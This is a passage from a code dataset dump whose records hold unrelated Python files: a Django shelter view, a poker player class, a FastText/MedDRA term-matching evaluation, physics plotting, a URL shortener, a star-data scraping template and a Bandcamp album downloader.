import models\nimport json\n\n\ndef index(request):\n shelters = models.Shelter.objects.order_by('occupants')\n serialized = [{\n \"camp_id\": s.camp.id,\n \"type\": s.get_type_display(),\n \"shelter_id\": s.shelter_id,\n \"location\": {\"coordinates\": [s.location.x, s.location.y]}, #json.loads(s.location.json),\n \"occupants\": s.occupants,\n } for s in shelters]\n\n c = models.Camp.objects.get(camp_id=1)\n\n camp = {\n \"name\": c.camp_name,\n }\n\n return render_to_response(\"index.html\", {\n \"shelters\": json.dumps(serialized),\n \"camp\": json.dumps(camp),\n }, RequestContext(request))\n\ndef list(request):\n shelters = models.Shelter.objects.order_by('occupants', 'type', 'shelter_id')\n return render_to_response(\"list.html\", {\n \"shelters\": shelters,\n }, RequestContext(request))\n", "sub_path": "shelters/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1059, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.shortcuts.render_to_response", "line_number": 28, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 29, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 30, "usage_type": "call"}, {"api_name": "django.template.RequestContext", "line_number": 31, "usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 35, "usage_type": "call"}, {"api_name": "django.template.RequestContext", "line_number": 37, "usage_type": "call"}]} +{"seq_id": "439796982", "text": "from random import randint\nfrom gym import error\nfrom treys import Card\nfrom include import *\n\nclass Player(object):\n\n CHECK = 0\n CALL = 1\n RAISE = 2\n FOLD = 3\n\n total_plrs = 0\n def __init__(self, player_id, stack=2000, emptyplayer=False):\n \n self.player_id = player_id\n self.hand = []\n self.stack = stack\n self.currentbet = 0\n self.lastsidepot = 0\n self._seat = -1\n self.handrank = -1\n # flags for table management\n self.emptyplayer = emptyplayer\n self.betting = False\n self.isallin = False\n self.playing_hand = False\n self.playedthisround = False\n self.sitting_out = True\n self.evaluation_preflop = {'hand_strength': '', 'he': '', 'evaluation': 0, 'rc': '', 'score_desc': '', 'player_action': ''}\n self.evaluation_flop = {'hand_strength': '', 'he': '', 'evaluation': 0, 'rc': '', 'score_desc': '', 'player_action': ''}\n self.evaluation_turn = {'hand_strength': '', 'he': '', 'evaluation': 0, 'rc': '', 'score_desc': '', 'player_action': ''}\n self.evaluation_river = {'hand_strength': '', 'he': '', 'evaluation': 0, 'rc': '', 'score_desc': '', 'player_action': ''}\n self.he = None\n self.round = {'moves_i_made_in_this_round_sofar': '', 'possible_moves': set([]), 'raises_owed_to_me': 0, \"raises_i_owe\": 0}\n self.possible_moves = []\n self.position = player_id \n self.debug_raises = {}\n self.reward = None\n self.action_type = None\n self.regret = {}\n self.raise_possible_tba = False\n self.certainty_to_call = 0\n self.round_track_stack = stack\n self.stack_start_game = stack\n \n\n def get_seat(self):\n return self._seat\n\n def is_possible(self, move):\n move_possible = False\n for item in self.round['possible_moves']:\n if item == move:\n return True\n return move_possible \n\n def count_r(self, my_string, spec=None):\n count_r = 0\n\n if spec is None:\n\n for letter in my_string:\n if letter == 'R' or letter == 'r':\n count_r = count_r + 1\n\n \n else:\n\n for letter in my_string:\n if letter == 'c':\n count_r = count_r + 1\n\n return 
count_r\n\n\n def set_handrank(self, value):\n self.handrank = value\n\n def populatePlayerPossibleMoves(self, env):\n possible_moves = []\n if(self.count_r(env.last_seq_move) == 3):\n self.round['possible_moves'].clear()\n self.round['possible_moves'].add('c')\n self.round['possible_moves'].add('f')\n \n else:\n self.round['possible_moves'].clear()\n self.round['possible_moves'].add('r')\n self.round['possible_moves'].add('c')\n self.round['possible_moves'].add('f')\n\n def choose_action(self, _round, range_structure, env):\n self.debug_raises.update({_round:env.level_raises})\n if self.round['raises_i_owe'] == 3:\n raise(\"error\")\n betting_threshold = range_structure['betting'][self.round['raises_i_owe']][self.position]\n calling_threshold = range_structure['calling'][self.round['raises_i_owe']][self.position]\n action = None\n using_handstrength = False\n\n if range_structure == preflop_range:\n eval_cards = self.evaluation_preflop[\"evaluation\"]\n \n else:\n eval_cards = self.he.hand_strength\n using_handstrength = True\n\n decide_boundaries = self.compare_eval_threshold(eval_cards, [betting_threshold, calling_threshold])\n\n self.raise_possible_tba = self.is_possible('r')\n # Now, for distributing rewards later we need to know the probability that our villain will stay in the hand given that he faces another raise:\n # The reason for checking that here is that, with the artificial agent, we get certainties about his actions.\n check_next = self.round['raises_i_owe'] + 1\n if check_next < 3:\n \n potential_calling_threshold = range_structure['calling'][check_next][self.position] # Tells you how strong villain's next hand must be\n \n if using_handstrength:\n self.certainty_to_call = 1 if eval_cards > potential_calling_threshold else 0 \n else:\n \n self.certainty_to_call = 1 if eval_cards < potential_calling_threshold else 0 \n\n if (decide_boundaries == betting_threshold) and self.is_possible('r'):\n # total_bet = env._tocall + env._bigblind - self.currentbet if _round == 'Preflop' else 25\n total_bet = None\n if _round == 'Preflop' and self.position == 0:\n \n total_bet = 40\n else:\n total_bet = 25\n\n action = (2, total_bet)\n assert action[1] == 40 or action[1] == 25\n elif (decide_boundaries == calling_threshold or decide_boundaries == betting_threshold) and self.is_possible('c'):\n action = [(1, 0), (0, 0)] # or 0\n else:\n action = (3, 0)\n\n return action\n\n def set_seat(self, value):\n self._seat = value\n\n \n def compare_eval_threshold(self, a, list_ev):\n ans = -1\n for b in list_ev:\n st = (a>b)-(a<b)\n if self.he is not None: # assumed guard: post-flop hand-strength evaluation, where higher value = stronger\n if st >= 1:\n return b\n else:\n continue\n else: # Standard Evaluation (Pre-Flop)\n if st >= 1:\n continue\n else:\n return b\n\n return -1\n\n def reset_hand(self):\n self._hand = []\n self.playedthisround = False\n self.betting = False\n self.isallin = False\n self.currentbet = 0\n self.lastsidepot = 0\n self.playing_hand = (self.stack != 0)\n\n def bet(self, bet_size):\n self.playedthisround = True\n if not bet_size:\n return\n self.stack -= (bet_size - self.currentbet) # Total - 10 in case of SB calling to see flop\n self.currentbet = bet_size\n if self.stack == 0:\n self.isallin = True\n\n def refund(self, ammount):\n self.stack += ammount\n\n def player_state(self):\n return (self.get_seat(), self.stack, self.playing_hand, self.betting, self.player_id)\n\n def reset_stack(self):\n self.stack = 2000\n\n def update_localstate(self, table_state):\n self.stack = table_state.get('stack')\n self.hand = table_state.get('pocket_cards')\n\n # cleanup\n def player_move(self, 
table_state, action, last_seq_move=None, _round=None):\n self.update_localstate(table_state)\n bigblind = table_state.get('bigblind')\n tocall = min(table_state.get('tocall', 0), self.stack)\n minraise = 0 #table_state.get('minraise', 0) - 10\n [action_idx, raise_amount] = action\n raise_amount = int(raise_amount) \n action_idx = int(action_idx)\n if action[0] == 2:\n if _round == 0:\n if self.position == 0 and self.count_r(last_seq_move) == 0:\n action[1] = 40\n elif self.position == 2:\n action[1] = 50 if self.count_r(last_seq_move) > 0 else 25\n if self.get_seat() == 2 and self.count_r(last_seq_move) > 0:\n action[1] = 50 if self.count_r(last_seq_move) > 1 else 25\n else:\n \n action[1] = 50 if self.count_r(last_seq_move) > 0 else 25\n \n if (self.count_r(last_seq_move)) > 1 or _round != 0:\n \n to_call = 25 * (self.count_r(last_seq_move)) \n\n [action_idx, raise_amount] = action\n raise_amount = int(raise_amount) \n action_idx = int(action_idx)\n\n if tocall == 0:\n # if not(action_idx in [Player.CHECK, Player.RAISE]):\n # print(\"watch\")\n assert action_idx in [Player.CHECK, Player.RAISE]\n if action_idx == Player.RAISE:\n if raise_amount < minraise:\n raise error.Error('raise must be greater than minraise {}'.format(minraise))\n if raise_amount > self.stack:\n raise_amount = self.stack\n move_tuple = ('raise', raise_amount)\n elif action_idx == Player.CHECK:\n move_tuple = ('check', 0)\n else:\n raise error.Error('invalid action ({}) must be check (0) or raise (2)'.format(action_idx))\n else:\n if action_idx not in [Player.RAISE, Player.CALL, Player.FOLD]:\n raise error.Error('invalid action ({}) must be raise (2), call (1), or fold (3)'.format(action_idx))\n if action_idx == Player.RAISE:\n if raise_amount < minraise:\n raise error.Error('raise must be greater than minraise {}'.format(minraise))\n if raise_amount > self.stack:\n raise_amount = self.stack\n move_tuple = ('raise', raise_amount)\n elif action_idx == Player.CALL:\n move_tuple = ('call', tocall)\n elif action_idx == Player.FOLD:\n move_tuple = ('fold', -1)\n else:\n raise error.Error('invalid action ({}) must be raise (2), call (1), or fold (3)'.format(action_idx))\n return move_tuple\n", "sub_path": "main_files/holdem/holdem/player.py", "file_name": "player.py", "file_ext": "py", "file_size_in_byte": 8489, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "gym.error.Error", "line_number": 230, "usage_type": "call"}, {"api_name": "gym.error", "line_number": 230, "usage_type": "name"}, {"api_name": "gym.error.Error", "line_number": 237, "usage_type": "call"}, {"api_name": "gym.error", "line_number": 237, "usage_type": "name"}, {"api_name": "gym.error.Error", "line_number": 240, "usage_type": "call"}, {"api_name": "gym.error", "line_number": 240, "usage_type": "name"}, {"api_name": "gym.error.Error", "line_number": 243, "usage_type": "call"}, {"api_name": "gym.error", "line_number": 243, "usage_type": "name"}, {"api_name": "gym.error.Error", "line_number": 252, "usage_type": "call"}, {"api_name": "gym.error", "line_number": 252, "usage_type": "name"}]} +{"seq_id": "649226955", "text": "# -*- coding: utf8 -*-\n \nimport json\nimport numpy as np\nimport os\nfrom gensim.models.wrappers import FastText\nfrom tqdm import tqdm\nimport sys\nfrom sklearn.metrics import classification_report, precision_recall_fscore_support\nimport json\nimport re\nimport gensim\nfrom pymorphy2 import MorphAnalyzer\nfrom sklearn.metrics import classification_report, 
precision_recall_fscore_support\nfrom sklearn.metrics import precision_score\n\nmorph = MorphAnalyzer()\n\ndef cosine(u, v):\n return np.dot(u, v)/(np.linalg.norm(u)*np.linalg.norm(v))\n\t\n\nFT_PATH = '/bigdisk/Mihail/'\nprint('Initializing FastText model')\nfasttext_model = os.path.join(FT_PATH, 'cc.en.300')\nft_model = FastText.load_fasttext_format(fasttext_model)\n\n\n# ft_model= gensim.models.FastText.load_fasttext_format('/bigdisk/Mihail/ft_native_300_ru_wiki_lenta_lemmatize', binary=False)\n# ft_model.save_word2vec_format('/bigdisk/Mihail/ft_native_300_ru_wiki_lenta_lemmatize'+\".bin\", binary=True)\n# ft_model = gensim.models.FastText.load_fasttext_format('/bigdisk/Mihail/ft_native_300_ru_wiki_lenta_lemmatize'+\".bin\", binary=True)\n\nprint(\"llt from Meddra in FastText\")\nmeddra_model = []\nid_words = []\nwith open(\"llt.asc\", \"r\") as f:\n\tlltLines = f.readlines()\n\tlltLines = [x.split('$') for x in lltLines ]\n\tfor line in tqdm(lltLines):\n\t\ttry:\n\t\t\tel_model_vec = ft_model[line[1]]\n\t\t\tmeddra_model.append(el_model_vec)\n\t\t\tid_words.append(line[2])\n\t\texcept:\n\t\t\tpass\n\n\n# def GetPhrase_pt(probablyPT):\n\t# pt_id = None\n\t# for line in lltLines:\n\t\t# if probablyPT == line[1]:\n\t\t\t# pt_id = line[2]\n\t\t\t# break\n\t# else:\n\t\t# pt_id = \"CONCEPT_LESS\"\n\t# return pt_id\n\n\t# raise ValueError(\"PT not found in pt.asc\", [probablyPT])\n\t\ndef GetPtId(probablyPT):\n\tif probablyPT == 'CONCEPT_LESS':\n\t\treturn 'CONCEPT_LESS'\n\tfor i, line in enumerate(lltLines ):\n\t\t#if line.strip() == \"\":\n\t\t\t#raise ValueError(\"Empty string #\",i)\n\t\tif probablyPT == line[0]:\n\t\t\treturn line[2] \n\t\telif probablyPT == line[2]:\n\t\t\treturn probablyPT\n\t\n\nprint(\"phrase from Cadec in FastText\")\npath = \"/bigdisk/Mihail/meddra/\"\ncadec_model = []\ny_true, y_pred = [], []\nmax_vector = []\nfor i_file, fileName in tqdm(enumerate(os.listdir(path))):\n\tif i_file % 50 == 0:\n\t\tprint(\"files processed:\", i_file)\n\twith open(path+\"/\"+fileName, \"r\") as f:\n\t\tfor i_line, line in enumerate(f):\n\t\t\tid_counter = 0\n\t\t\tline = re.sub(\" {3,}\", \"\\t\", line)\n\t\t\tline = line.split(\"\\t\")\n\t\t\tphrase = line[-1]\n\t\t\tnorm_phrase = list()\n\t\t\tphrase = phrase.replace('\\\\', '')\n\t\t\tphrase = phrase.replace('\\n', '')\n\t\t\tphrase = phrase.replace(\"'\", '')\n\t\t\tphrase = phrase.replace('\"', '')\n\t\t\tphrase = phrase.strip(\"\\t\")\n\t\t\twords = phrase.split(' ')\n\t\t\tfor word in words:\n\t\t\t\tword = word.replace(',', '')\n\t\t\t\ttry:\n\t\t\t\t\tparsResult = morph.parse(word)[0]\n\t\t\t\t\tlemma = parsResult.normal_form.upper()\n\t\t\t\t\tnorm_phrase.append(lemma.lower())\n\t\t\t\texcept:\n\t\t\t\t\tnorm_phrase.append(word.lower())\n\t\t\tif len(norm_phrase) > 1:\n\t\t\t\tnorm_phrase = ' '.join(norm_phrase)\n\t\t\t\ttry:\n\t\t\t\t\telemCadec = ft_model[norm_phrase]\n\t\t\t\t\t# print(norm_phrase)\n\t\t\t\t\t# Nvector = []\n\t\t\t\t\t# norm_phrase = re.sub(\"\\d\", \"\", norm_phrase)\n\t\t\t\t\t# norm_phrase = re.sub(\"/\", \"\", norm_phrase)\n\t\t\t\t\t# norm_phrase = norm_phrase.split()\n\t\t\t\t\t# for Nphrase in norm_phrase:\n\t\t\t\t\t\t# Nvector.append(ft_model[Nphrase])\n\t\t\t\t\t# elemCadec = np.mean(Nvector)\n\t\t\t\t\t# np.transpose(elemCadec)\n\t\t\t\t\t# elemCadec = elemCadec[1:300]\n\t\t\t\t\t# print(elemCadec)\n\t\t\t\t\t# print(fileName)\n\t\t\t\t\t# print(norm_phrase)\n\t\t\t\t\tif \"/\" in line[1]:\n\t\t\t\t\t\tpt_true = 
GetPtId(line[1].split(\"/\")[0])\n\t\t\t\t\t\ty_true.append(pt_true)\n\t\t\t\t\t\tid_counter += 1\n\t\t\t\t\t\tpt_true = GetPtId(line[1].split('/')[1].split()[0])\n\t\t\t\t\t\ty_true.append(pt_true)\n\t\t\t\t\t\tid_counter += 1\n\t\t\t\t\telif \"+\" in line[1]:\n\t\t\t\t\t\tpt_true = GetPtId(line[1].split()[0])\n\t\t\t\t\t\ty_true.append(pt_true)\n\t\t\t\t\t\tid_counter += 1\n\t\t\t\t\t\tpt_true = GetPtId(line[1].split()[2])\n\t\t\t\t\t\ty_true.append(pt_true)\n\t\t\t\t\t\tid_counter += 1\n\t\t\t\t\telse:\n\t\t\t\t\t\tpt_true = GetPtId(line[1].split()[0])\n\t\t\t\t\t\ty_true.append(pt_true)\n\t\t\t\t\t\tid_counter += 1\n\t\t\t\t\tmax_sim = -100\n\t\t\t\t\tid_max_sim = ''\n\t\t\t\t\tfor i_id, elemMeddra in zip(id_words, meddra_model):\n\t\t\t\t\t\tsim = cosine(elemCadec, elemMeddra)\n\t\t\t\t\t\tif sim > max_sim:\n\t\t\t\t\t\t\tmax_sim = sim\n\t\t\t\t\t\t\tid_max_sim = i_id\n\t\t\t\t\ty_pred.append(id_max_sim)\n\t\t\t\t\tif id_counter == 2:\n\t\t\t\t\t\ty_pred.append(id_max_sim)\n\t\t\t\t\tif len(y_true) > len(y_pred):\n\t\t\t\t\t\tprint(fileName)\n\t\t\t\texcept:\n\t\t\t\t\tpass\n\t\t\t# break\n\t\t\t# print(y_true)\n\t\t\t# print(y_pred)\n\t\t\t# break\n\t\t\t\t\t\n\n\t\n\t\"\"\"\n\tThis is the accuracy for CADEC terms made up of several words (more than 2), with vectors\n\tobtained by simply feeding the whole entity into the FT model.\n\t\n\t\"\"\"\n\t\nreport = classification_report(y_true, y_pred, output_dict = True)\nprint('macro avg', report['macro avg'])\nprint('weighted avg', report['weighted avg'])\nprint('accuracy', report['accuracy'])\n\n\n\n\n\n", "sub_path": "test_FastText_Cadec1.py", "file_name": "test_FastText_Cadec1.py", "file_ext": "py", "file_size_in_byte": 4845, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pymorphy2.MorphAnalyzer", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 20, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "gensim.models.wrappers.FastText.load_fasttext_format", "line_number": 26, "usage_type": "call"}, {"api_name": "gensim.models.wrappers.FastText", "line_number": 26, "usage_type": "name"}, {"api_name": "tqdm.tqdm", "line_number": 39, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 77, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 77, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 83, "usage_type": "call"}, {"api_name": "sklearn.metrics.classification_report", "line_number": 163, "usage_type": "call"}]} +{"seq_id": "126482989", "text": "from numpy import *\nfrom matplotlib.pyplot import *\nfrom scipy.optimize import curve_fit\nimport os\n\ndef readFileTwoColoumns(inpFile):\n infile = open(inpFile,\"r\")\n first = []\n second = []\n for line in infile:\n split = line.split()\n first.append(float(split[0]))\n second.append(float(split[1]))\n return first,second\n\ndef readFileThreeColoumns(inpFile):\n infile = open(inpFile,\"r\")\n first = []\n second = []\n third = []\n for line in infile:\n split = line.split()\n first.append(float(split[0]))\n second.append(float(split[1]))\n third.append(float(split[2]))\n return first,second,third\n\ndef plot_data():\n\n #make path to store figures and fetch data\n main_path = os.getcwd()\n 
data_path = os.path.normpath(main_path+os.sep+os.pardir+\"\\Data\")\n figure_path = os.path.normpath(main_path+os.sep+os.pardir+\"\\Figures\")\n try:\n os.mkdir(figure_path)\n except OSError:\n print (\"Creation of the directory %s failed. It may already exist.\" % figure_path)\n else:\n print (\"Successfully created the directory %s \" % figure_path)\n\n #Three lowest states in single electron system\n rho0_single0,psi0_single = readFileTwoColoumns(data_path+\"\\E_0.dat\")\n rho1_single1,psi1_single = readFileTwoColoumns(data_path+\"\\E_1.dat\")\n rho2_single2,psi2_single = readFileTwoColoumns(data_path+\"\\E_2.dat\")\n\n plot(rho0_single0,psi0_single)\n title(\"GS, single electron\")\n xlabel(r\"$\\rho$\")\n ylabel(\"$|\\psi(\\\\rho)|^{2}$\")\n savefig(figure_path+\"\\E_0.png\")\n print(\"Saved: E_0.png\")\n clf()\n\n plot(rho1_single1,psi1_single)\n title(\"1st exited state, single electron\")\n xlabel(r\"$\\rho$\")\n ylabel(\"$|\\psi(\\\\rho)|^{2}$\")\n savefig(figure_path+\"\\E_1.png\")\n print(\"Saved: E_1.png\")\n clf()\n\n plot(rho2_single2,psi2_single)\n title(\"2nd exited state, single electron\")\n xlabel(r\"$\\rho$\")\n ylabel(\"$|\\psi(\\\\rho)|^{2}$\")\n savefig(figure_path+\"\\E_2.png\")\n print(\"Saved: E_2.png\")\n clf()\n\n #Lowest state in two-electron system without potential and 4 different frequencies\n rho0_double_001, psi_001 = readFileTwoColoumns(data_path+\"\\E_GS_0_0_1_No_Interaction.dat\")\n rho0_double_05, psi_05 = readFileTwoColoumns(data_path+\"\\E_GS_0_5_No_Interaction.dat\")\n rho0_double_1, psi_1 = readFileTwoColoumns(data_path+\"\\E_GS_1_No_Interaction.dat\")\n rho0_double_5, psi_5 = readFileTwoColoumns(data_path+\"\\E_GS_5_No_Interaction.dat\")\n\n plot(rho0_double_001,psi_001, label = \"$\\\\omega_{r} = 0.01$\")\n plot(rho0_double_05,psi_05, label = \"$\\\\omega_{r} = 0.5$\")\n plot(rho0_double_1,psi_1, label = \"$\\\\omega_{r} = 1$\")\n plot(rho0_double_5,psi_5, label = \"$\\\\omega_{r} = 5$\")\n title(\"GS, two electrons, varying HO-frequency, no interaction.\")\n xlabel(r\"$\\rho$\")\n ylabel(\"$|\\psi(\\\\rho)|^{2}$\")\n legend()\n savefig(figure_path+\"\\E_GS_No_Interaction.png\")\n print(\"Saved: E_GS_No_Interaction.png\")\n clf()\n\n\n #Lowest state in two-electron system with potential and 4 different frequencies\n rho0_double_001_int, psi_001_int = readFileTwoColoumns(data_path+\"\\E_GS_0_0_1_With_Interaction.dat\")\n rho0_double_05_int, psi_05_int = readFileTwoColoumns(data_path+\"\\E_GS_0_5_With_Interaction.dat\")\n rho0_double_1_int, psi_1_int = readFileTwoColoumns(data_path+\"\\E_GS_1_With_Interaction.dat\")\n rho0_double_5_int, psi_5_int = readFileTwoColoumns(data_path+\"\\E_GS_5_With_Interaction.dat\")\n\n plot(rho0_double_001_int,psi_001_int, label = \"$\\\\omega_{r} = 0.01$\")\n plot(rho0_double_05_int,psi_05_int, label = \"$\\\\omega_{r} = 0.5$\")\n plot(rho0_double_1_int,psi_1_int, label = \"$\\\\omega_{r} = 1$\")\n plot(rho0_double_5_int,psi_5_int, label = \"$\\\\omega_{r} = 5$\")\n title(\"GS, two electrons, varying HO-frequency, with interaction.\")\n xlabel(r\"$\\rho$\")\n ylabel(\"$|\\psi(\\\\rho)|^{2}$\")\n legend()\n savefig(figure_path+\"\\E_GS_With_Interaction.png\")\n print(\"Saved: E_GS_With_Interaction.png\")\n clf()\n\n #Number of iterations as function of steps and value of eigenvalue approximation as function of steps\n n_step, n_iter, lamda = readFileThreeColoumns(data_path+\"\\iterations_transformations_eigenvalues_rho_max_3.dat\")\n\n def func(x,a,b):\n return a*x**2 + b\n\n plot(n_step,n_iter, label=\"$\\\\rho_{max} 
= 3.0$\")\n popt, pcov = curve_fit(func,array(n_step),array(n_iter))\n #plot(n_step,func(array(n_step),*popt), linestyle = \"--\", label =\"Optimixed curve: y = $%.2fx^{2} + %.2f$\"% tuple(popt))\n print(\"Optimized curve: y = %.2fx**2 %.2f\"% tuple(popt))\n title(\"Number of transformations as function of integration points n.\")\n xlabel(\"n\")\n ylabel(\"Number of orthogonal transformations\")\n legend()\n savefig(figure_path+\"\\\\Number_Of_Transformations.png\")\n print(\"Saved: Number_Of_Transformations.png\")\n clf()\n\n #Eigenvalue approximation as function of steps n\n plot(n_step,lamda, label=\"$\\\\rho_{max} = 3.0$\")\n title(\"Eigenvalue approximation of GS as function of integration points n.\")\n xlabel(\"n\")\n ylabel(\"Eigenvalue approximation\")\n legend()\n savefig(figure_path+\"\\Eigenvalues_Approx.png\")\n print(\"Saved: Eigenvalues_Approx.png\")\n clf()\n", "sub_path": "Project2/Python/fys3150_project2_plot_data.py", "file_name": "fys3150_project2_plot_data.py", "file_ext": "py", "file_size_in_byte": 5191, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "os.getcwd", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path.normpath", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path", "line_number": 32, "usage_type": "attribute"}, {"api_name": "os.sep", "line_number": 32, "usage_type": "attribute"}, {"api_name": "os.pardir", "line_number": 32, "usage_type": "attribute"}, {"api_name": "os.path.normpath", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path", "line_number": 33, "usage_type": "attribute"}, {"api_name": "os.sep", "line_number": 33, "usage_type": "attribute"}, {"api_name": "os.pardir", "line_number": 33, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 35, "usage_type": "call"}, {"api_name": "scipy.optimize.curve_fit", "line_number": 114, "usage_type": "call"}]} +{"seq_id": "24969085", "text": "import base64\nimport hashlib\nimport logging\n\nimport validators\n\n\nclass URLShortener():\n \"\"\"Shorten the URL.\"\"\"\n length = 5\n\n def __init__(self, length):\n self.init_log()\n\n def short(self, url):\n \"\"\"Hash the URL by md5 and base64, return shorter characters.\"\"\"\n if validators.url(url):\n sha = hashlib.md5(url.encode('utf-8')).digest()\n altchars = '-_'.encode('utf-8')\n sha_base64 = base64.b64encode(sha, altchars).decode('utf-8')\n\n logging.info('URL: %s ===> %s', url, sha_base64[:self.length])\n return sha_base64[:self.length]\n else:\n logging.info('ValidationFailure. 
===> %s', url)\n return None\n\n def init_log(self):\n \"\"\"Init the logger.\"\"\"\n FORMAT = '%(asctime)-20s %(levelname)-9s %(message)s'\n DATEFORMAT = '%Y-%m-%d %H:%M:%S'\n handler = logging.FileHandler('log.log', mode='a', encoding='utf-8')\n logging.basicConfig(handlers=[handler],\n format=FORMAT,\n datefmt=DATEFORMAT,\n level=logging.INFO)\n\n console = logging.StreamHandler()\n console.setLevel(logging.INFO)\n console.setFormatter(logging.Formatter(fmt=FORMAT, datefmt=DATEFORMAT))\n logging.getLogger().addHandler(console)\n", "sub_path": "short_url_generator.py", "file_name": "short_url_generator.py", "file_ext": "py", "file_size_in_byte": 1346, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "validators.url", "line_number": 17, "usage_type": "call"}, {"api_name": "hashlib.md5", "line_number": 18, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 20, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 22, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 25, "usage_type": "call"}, {"api_name": "logging.FileHandler", "line_number": 32, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 33, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 36, "usage_type": "attribute"}, {"api_name": "logging.StreamHandler", "line_number": 38, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 39, "usage_type": "attribute"}, {"api_name": "logging.Formatter", "line_number": 40, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 41, "usage_type": "call"}]} +{"seq_id": "597135429", "text": "import json \n\ndata = '''\n{\n \"name\":\"Banner\",\n \"phone\":\"Classified\",\n \"id\" : \"Classified\",\n \"intercom\" :{\n \"type\": \"intl\",\n \"value\":\"99392933\"\n },\n\n \"email\" :{\n \"hide\":\"True\"\n }\n}\n'''\n\ninfo = json.loads(data)\nprint('Name:',info[\"name\"])\nprint('ID:',info[\"id\"])\nprint('Intercom:',info[\"intercom\"][\"value\"])\nprint('E-Mail:',info[\"email\"][\"hide\"])\nprint(\"Phone:\",info[\"phone\"])\n\n", "sub_path": "agent.py", "file_name": "agent.py", "file_ext": "py", "file_size_in_byte": 391, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "json.loads", "line_number": 19, "usage_type": "call"}]} +{"seq_id": "422638915", "text": "\r\nfrom bs4 import BeautifulSoup as bs\r\nimport requests\r\nimport pandas as pd\r\n\r\n# put the url from the PDF\r\n#bright_stars_url = \r\n\r\npage = requests.get(bright_stars_url)\r\n#print(page)\r\n\r\nsoup = bs(page.text,'html.parser')\r\n# use soup.find() by passing 'table' as parameter and assign to variable star_table\r\n\r\n# take an empty list vaiable called temp_list\r\n\r\n#use star_table.find_all('tr') and assign to table_rows\r\n\r\nfor tr in table_rows:\r\n td = tr.find_all('td')\r\n row = [i.text.rstrip() for i in td]\r\n temp_list.append(row)\r\n\r\n\r\n\r\nStar_names = []\r\nDistance =[]\r\nMass = []\r\nRadius =[]\r\nLum = []\r\n\r\nfor i in range(1,len(temp_list)):\r\n Star_names.append(temp_list[i][1])\r\n Distance.append(temp_list[i][3])\r\n Mass.append(temp_list[i][5])\r\n Radius.append(temp_list[i][6])\r\n Lum.append(temp_list[i][7])\r\n \r\ndf2 = pd.DataFrame(list(zip(Star_names,Distance,Mass,Radius,Lum)),columns=['Star_name','Distance','Mass','Radius','Luminosity'])\r\nprint(df2)\r\n\r\n#use df2.to_csv and pass a file name \r\n", "sub_path": 
"data_scraping_1.py", "file_name": "data_scraping_1.py", "file_ext": "py", "file_size_in_byte": 1013, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "requests.get", "line_number": 9, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 12, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "582421051", "text": "#Code by: Krazoa\n#Bandcamp Spider: v0.1\n\nimport shutil\nimport os\nimport sys\nfrom bs4 import BeautifulSoup\nimport requests\nfrom lxml import etree\nimport urllib.request\nimport re\nimport time\n\n#get target album URL**\nalbumURL = input(\"Enter target album URL: \")\nvalidationCondition = 0\n#get download destination file address (where track will be downloaded to\nwhile validationCondition == 0:\n downloadDestination = input(\"Enter URL of download destination on your computer: \")\n #check download destination and verify its existance\n downloadConfirm = input(\"Are you sure this is your download directory? This cannot be changed. Please type [confirm] or press enter to cancel: \").upper()\n if downloadConfirm == \"CONFIRM\":\n directoryValidation = os.path.exists(downloadDestination)\n if directoryValidation == False:\n print(\"Invalid directory. Check your input directory and try again\")\n else:\n print(\"Directory successfully validated\")\n validationCondition = 1\n else:\n validationCondition = 0\n \n#print(\"DEBUG: Loop Broken\")\n####Timer module\ntaskTimeStart = 0\ntaskTimeEnd = 0\ntaskTimeDiff = 0\ntaskTimeTotal = 0\n \n \n#Scrape album page**\nprint(\"Getting album page HTML...\")\ntaskTimeStart = time.time()\nresponse = requests.get(albumURL) #non-object var\nsoup = BeautifulSoup(response.content, \"lxml\")\n#print(str(soup)) #DEBUG: Checking to see if HTML was successfully grabbed\n#taskTimeList.append(taskTimeStart - taskTimeEnd)\nprint(\"Got album page HTML\")\ntaskTimeEnd = time.time()\ntaskTimeDiff = float(taskTimeEnd - taskTimeStart)\nprint(\"Operation completed in \", taskTimeDiff, \"s\")\ntaskTimeTotal += taskTimeDiff\n\n#download album cover\nprint(\"Downloading album cover...\")\ntaskTimeStart = time.time()\ncoverTag = soup.find(\"img\", itemprop=\"image\") #get album cover URL\ncoverUrl = coverTag.get(\"src\") #assign it to coverURL\nurllib.request.urlretrieve(coverUrl, 